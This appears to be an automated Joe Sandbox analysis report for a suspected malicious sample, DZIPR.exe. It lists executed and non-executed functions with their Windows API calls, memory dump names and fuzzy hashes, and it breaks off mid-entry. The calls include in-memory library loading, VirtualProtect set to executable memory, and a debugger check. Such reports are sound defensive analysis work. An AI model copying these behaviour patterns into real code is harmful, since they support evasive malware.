Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: EnvironmentVariable
String ID: ?O@
API String ID: 1431749950-3511380453
Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

Analysis Process: DZIPR.exePID: 4568, Parent PID: 3840COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.6%
Total number of Nodes:	1734
Total number of Limit Nodes:	37

Executed Functions

Function 6FA663F0 Relevance: 4.7, APIs: 3, Instructions: 239
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000), ref: 6FA66602
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FA6663B
VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6FA66654

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 41881c350274ffc890fbf218416a3e8db76204e8da4894e9f0a82b40daadcd03
Instruction ID: d8cff2a5cd352e3ed3a02f96f75daf54280ef75ba7d223d454d8f6240f29b736
Opcode Fuzzy Hash: 41881c350274ffc890fbf218416a3e8db76204e8da4894e9f0a82b40daadcd03
Instruction Fuzzy Hash: 8DA1DF306087558FC315CF29C58062AFBE6BFCA304F09896EE8959B346D735F996CB81

Function 6FA65CA0 Relevance: 3.4, APIs: 2, Instructions: 353
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: LibraryLoad_memset
String ID:
API String ID: 2997193564-0
Opcode ID: c00fd4526f90523be3bec7f7ef950da0915206d6d70076579191e3e34bc48dc4
Instruction ID: 6b3f5c58761592844ffa6e574840f0db50adeb4928cdd1d97d7b460547807d87
Opcode Fuzzy Hash: c00fd4526f90523be3bec7f7ef950da0915206d6d70076579191e3e34bc48dc4
Instruction Fuzzy Hash: A9E15BB0A087058FC714CF1AC49062AFBE5FF89314F55896EE89A87352DB34B895CF91

Function 6FA65E70 Relevance: 1.5, APIs: 1, Instructions: 248
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6FA65ECA

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 7ba0e5eb3502ff6bb0422f3baf058e226b65cbab5efcb28b58a559986c7ffed5
Instruction ID: e4c18bfb151c644ad1765362fb6d01d99a0328f7b3cd35191ebc358c4d6a183e
Opcode Fuzzy Hash: 7ba0e5eb3502ff6bb0422f3baf058e226b65cbab5efcb28b58a559986c7ffed5
Instruction Fuzzy Hash: 31A1A3706083068FC708CF1DC59062AB7E6BF89304F18C56DE89687356D735F896CB91

Function 6FA6BC4E Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(6FA932EC,?,?,?,6FA932D0,6FA932D0,?,6FA6C0A4,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?), ref: 6FA6BC61
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,6FA932D0,6FA932D0,?,6FA6C0A4,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?), ref: 6FA6BCB7
GlobalHandle.KERNEL32(00F1AF00), ref: 6FA6BCC0
GlobalUnlock.KERNEL32(00000000), ref: 6FA6BCCA
GlobalReAlloc.KERNEL32(6FA8C168,00000000,00002002), ref: 6FA6BCE3
GlobalHandle.KERNEL32(00F1AF00), ref: 6FA6BCF5
GlobalLock.KERNEL32(00000000), ref: 6FA6BCFC
LeaveCriticalSection.KERNEL32(?,?,?,6FA932D0,6FA932D0,?,6FA6C0A4,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?), ref: 6FA6BD05
GlobalLock.KERNEL32(00000000), ref: 6FA6BD11
_memset.LIBCMT ref: 6FA6BD2B
LeaveCriticalSection.KERNEL32(?,?), ref: 6FA6BD59

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: ea4430a68e584f20e0d97e61daad714dd46dcd03e15986775578b776a7d5590a
Instruction ID: 182a082c621df6e0cf7dada9b17a5047ef8925df96ac3e6bd14f77e5f7be4dc8
Opcode Fuzzy Hash: ea4430a68e584f20e0d97e61daad714dd46dcd03e15986775578b776a7d5590a
Instruction Fuzzy Hash: FB31AF71604B04AFDB208F64C889A8ABBF9FF46350B048A29F562DB750DF74F991CB50

Function 6FA664E0 Relevance: 4.7, APIs: 3, Instructions: 151
librarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000), ref: 6FA66602
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FA6663B

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: LibraryLoadProtectVirtual
String ID:
API String ID: 3279857687-0
Opcode ID: 6a38d8b944e5cc748c60f96d9d50e9ebcc192d5faf0bd231bc51e9298f743698
Instruction ID: 61c1084c33010c389dadcfc8db3fa13d84f772aa4d7361b2a74a1ff29b3d2862
Opcode Fuzzy Hash: 6a38d8b944e5cc748c60f96d9d50e9ebcc192d5faf0bd231bc51e9298f743698
Instruction Fuzzy Hash: 6951F3306083558FC715CF29C88062AFBEABFCA308F09896DE8855B316C735F946CB95

Function 6FA66750 Relevance: 1.6, APIs: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FA8C168), ref: 6FA66300

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 09f25f8358e41e864b56aa9fc93e958402ddd4d8073c7488a575acb30e65ba39
Instruction ID: dc3a90c2e4e9e56cf6f98301acd5f6befbd2b215c8a0585a585bbc899de548c1
Opcode Fuzzy Hash: 09f25f8358e41e864b56aa9fc93e958402ddd4d8073c7488a575acb30e65ba39
Instruction Fuzzy Hash: 5641C2356087058FD704CF19C88067AB7E6FFC6324F09C96DE8899B315D635F8958B81

Function 6FA662D0 Relevance: 1.6, APIs: 1, Instructions: 97
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FA8C168), ref: 6FA66300

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7e66584fc38acc01ce0dd716bd038cd6c103cfefea0bf9fa393daec80eefb22d
Instruction ID: 40b21ef278bcc4c2ace486a533810a89997dc0bda1740e86bac6b5a8a76b7a33
Opcode Fuzzy Hash: 7e66584fc38acc01ce0dd716bd038cd6c103cfefea0bf9fa393daec80eefb22d
Instruction Fuzzy Hash: DF31BF31A087058FC718CF19C88066AB7E6BFC6314F19C96DE8969B316D635F896CB81

Function 6FA6C050 Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 6FA6C057

Part of subcall function 6FA66DC1: __CxxThrowException@8.LIBCMT ref: 6FA66DD7
Part of subcall function 6FA66DC1: __EH_prolog3.LIBCMT ref: 6FA66DE4

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: H_prolog3$Exception@8Throw
String ID:
API String ID: 2489616738-0
Opcode ID: 690c3c7536aea81add65d59957869b99b1adeabde6c5625274ea453aa5a3fb80
Instruction ID: fc78cc262cbab5698b98b5573df74ff4bb6badcad01ca86f22216deb5ee3010c
Opcode Fuzzy Hash: 690c3c7536aea81add65d59957869b99b1adeabde6c5625274ea453aa5a3fb80
Instruction Fuzzy Hash: CC019A34210702CBDF28AE65841166D36B6AF513A6F258538E4958B2D0EF39D9828B10

Function 6FA660F0 Relevance: 1.5, APIs: 1, Instructions: 33
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6FA660F6

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f82b0445dcd6c41194a306ad42c12fe73917a35ba1a51f55d307128ec24a1e5e
Instruction ID: 04c68dfbb1e15867aea2da4e8a4728ae713d8ce4cba0bc342f5a52bddf2d1b8e
Opcode Fuzzy Hash: f82b0445dcd6c41194a306ad42c12fe73917a35ba1a51f55d307128ec24a1e5e
Instruction Fuzzy Hash: A501E8B49087019FC718CF0AC89091ABBE6FFC9314F16856DA84897316CA31E851CF85

Function 6FA7A6F4 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6FA74776,00000001,?,?,?,6FA748EF,?,?,?,6FA8E848,0000000C,6FA749AA), ref: 6FA7A709

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 7a9de5a02955649691a2696c3337ccb7db3a9cfbc5317f754d2287594839f794
Instruction ID: 071f5c277ab1c38e6cb6f635f6b034901f2210300e9ceaed4f6cbcd176d02701
Opcode Fuzzy Hash: 7a9de5a02955649691a2696c3337ccb7db3a9cfbc5317f754d2287594839f794
Instruction Fuzzy Hash: 14D02E365A8748AEDF108E719C08B223BFE97813A2F048431F80CC6180F9B4C0A18A04

Non-executed Functions

Function 6FA6748E Relevance: 12.1, APIs: 8, Instructions: 126filestringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FA67498
GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6FA676D5,?,00000000,?,00000000,00000104,00000000,?,6FA8BEF4,00000000), ref: 6FA674D6

Part of subcall function 6FA66DC1: __CxxThrowException@8.LIBCMT ref: 6FA66DD7
Part of subcall function 6FA66DC1: __EH_prolog3.LIBCMT ref: 6FA66DE4

PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6FA67546
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6FA6756D
CharUpperW.USER32(00000000), ref: 6FA675A0
FindFirstFileW.KERNEL32(?,?), ref: 6FA675BC
FindClose.KERNEL32(00000000), ref: 6FA675C8
lstrlenW.KERNEL32(?), ref: 6FA675E6

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 624941980-0
Opcode ID: 4f1a0569705df6164d42445e24f7c2703d1df86362c889036dd4b1fd36e2a402
Instruction ID: 0aed8d9feaffb26d220323ac8550e7cb9e431a0ba44c8a507beacb40f9dff988
Opcode Fuzzy Hash: 4f1a0569705df6164d42445e24f7c2703d1df86362c889036dd4b1fd36e2a402
Instruction Fuzzy Hash: 8641A1709183159BDF25AF74CD8CBAE7B78AF02318F0442D9E82992190EF799AD5CF10

Function 6FA73F34 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6FA77C6C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FA77C81
UnhandledExceptionFilter.KERNEL32(6FA8A4B8), ref: 6FA77C8C
GetCurrentProcess.KERNEL32(C0000409), ref: 6FA77CA8
TerminateProcess.KERNEL32(00000000), ref: 6FA77CAF

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 366a3618a74b9f487cf636d77decf6648249fb8a09d2ffb09cf7df79978ebc4e
Instruction ID: 85c32e96780ee70ff072917959de742e934bda56bf3b4d249c8249c3df2f9fd5
Opcode Fuzzy Hash: 366a3618a74b9f487cf636d77decf6648249fb8a09d2ffb09cf7df79978ebc4e
Instruction Fuzzy Hash: 6F21C574426B049FDB41DF59C9466493BF8BB0B326F60806AE4188B390DFB655A38F41

Function 6FA689B5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6FA689FC
__snwprintf_s.LIBCMT ref: 6FA68A2E
LoadLibraryW.KERNEL32(?), ref: 6FA68A69

Part of subcall function 6FA75348: __getptd_noexit.LIBCMT ref: 6FA75348

Strings

LOC, xrefs: 6FA689DC

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
String ID: LOC
API String ID: 3175857669-519433814
Opcode ID: f62954e626acc4740bb413c0201f0b7db0a12abd1eea1e126596ff49f91b7383
Instruction ID: 7fa5a94c95603809e7cb69263ae60ca9ebdcec40324fc024a57afb07c24e3b36
Opcode Fuzzy Hash: f62954e626acc4740bb413c0201f0b7db0a12abd1eea1e126596ff49f91b7383
Instruction Fuzzy Hash: 9011E779A65304AFDB21AB78CD54FBE77ACAF02358F050061A510A71D0DFBC99C08761

Function 6FA704EE Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 6FA72C57: GetWindowLongW.USER32(?,000000F0), ref: 6FA72C62

GetKeyState.USER32(00000010), ref: 6FA70514
GetKeyState.USER32(00000011), ref: 6FA7051D
GetKeyState.USER32(00000012), ref: 6FA70526
SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6FA7053C

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 84a7151a204a42505c6ea4e5754dbf21ed142f3b7af0bb6e8c8a935074c6abe6
Instruction ID: 78c0b6eefb6d253b4ae1084aa20b0c73d89d98c1435414039991959bb351c116
Opcode Fuzzy Hash: 84a7151a204a42505c6ea4e5754dbf21ed142f3b7af0bb6e8c8a935074c6abe6
Instruction Fuzzy Hash: 3AF0B4397C078EA5EA3065744E01FE9062D8F81BA4F04D0327655AA1C0CFAAC5824660

Function 6FA6DE29 Relevance: 4.5, APIs: 3, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91fdad101ce427703c0bb3646f7cbfa01ddef275d2f5f45756b322978ba823e6
Instruction ID: d3aca6b7c5f52ddf36f2a867a9c2adc060439327c4418eea47686aceead9dfb6
Opcode Fuzzy Hash: 91fdad101ce427703c0bb3646f7cbfa01ddef275d2f5f45756b322978ba823e6
Instruction Fuzzy Hash: A2F03C31504209ABDF129FB5CD04AAE3B6AEF227D4F54C021F929D9050DF79DA91DB50

Function 6FA65D78 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fc6bcfc5d32107f7e307bb79f8579f2259bf2e830f917530a63fa9d14b02e51
Instruction ID: 3a5fcc4fad1ad98bdc126b8eabd3a247661df4cf5c17e193ae37c0d3676532ff
Opcode Fuzzy Hash: 9fc6bcfc5d32107f7e307bb79f8579f2259bf2e830f917530a63fa9d14b02e51
Instruction Fuzzy Hash: 0A316676A087058FCB24CF59C58062AB7E6FFC9714F5A886DE88857342DB34F895CB81

Function 6FA68BDF Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 159libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FA68BE9
GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FA68EB7,?,?), ref: 6FA68C19
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FA68C2D
ConvertDefaultLocale.KERNEL32(?), ref: 6FA68C69
ConvertDefaultLocale.KERNEL32(?), ref: 6FA68C77
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FA68C94
ConvertDefaultLocale.KERNEL32(?), ref: 6FA68CBF
ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FA68CC8
GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6FA68CE1
EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6FA68CFE
ConvertDefaultLocale.KERNEL32(?), ref: 6FA68D31
ConvertDefaultLocale.KERNEL32(00000000), ref: 6FA68D3A
GetModuleFileNameW.KERNEL32(6FA60000,?,00000105), ref: 6FA68D7F
_memset.LIBCMT ref: 6FA68D9F

Strings

GetSystemDefaultUILanguage, xrefs: 6FA68C79
ntdll.dll, xrefs: 6FA68CDC
kernel32.dll, xrefs: 6FA68C02
GetUserDefaultUILanguage, xrefs: 6FA68C21

Memory Dump Source

